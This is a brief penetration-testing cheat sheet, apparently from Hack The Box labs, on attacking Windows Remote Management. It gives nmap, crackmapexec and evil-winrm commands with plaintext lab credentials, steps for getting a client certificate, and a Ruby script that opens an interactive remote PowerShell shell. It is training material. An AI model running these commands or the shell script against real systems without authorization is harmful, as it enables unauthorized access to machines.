#Footprinting
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
#Verify password
Intrusionz3r0X@htb[/htb]$ crackmapexec winrm 10.10.11.222 -u 'ansible' -p 'DevT3st@123'
# Log into WinRM
Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
Intrusionz3r0X@htb[/htb]$ evil-winrm -S -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c certnew.cert -k mykey.key
If you face something like this you must create a certificate request so that the server issue the certificate to download.
# Generate private key
openssl genrsa -out mykey.key 2048
# Create a certificate signing request (CSR)
openssl req -new -key mykey.key -out request.csr
Copy and past the request.csr content, paste it and submit. if everything is fine, the server will issue a certificate to use.
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
endpoint: 'https://10.10.10.103:5986/wsman',
transport: :ssl,
client_cert: 'certnew.cer',
client_key: 'mykey.key',
#user: 'amanda',
#password: 'Ashare1972',
:no_ssl_peer_verification => true
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
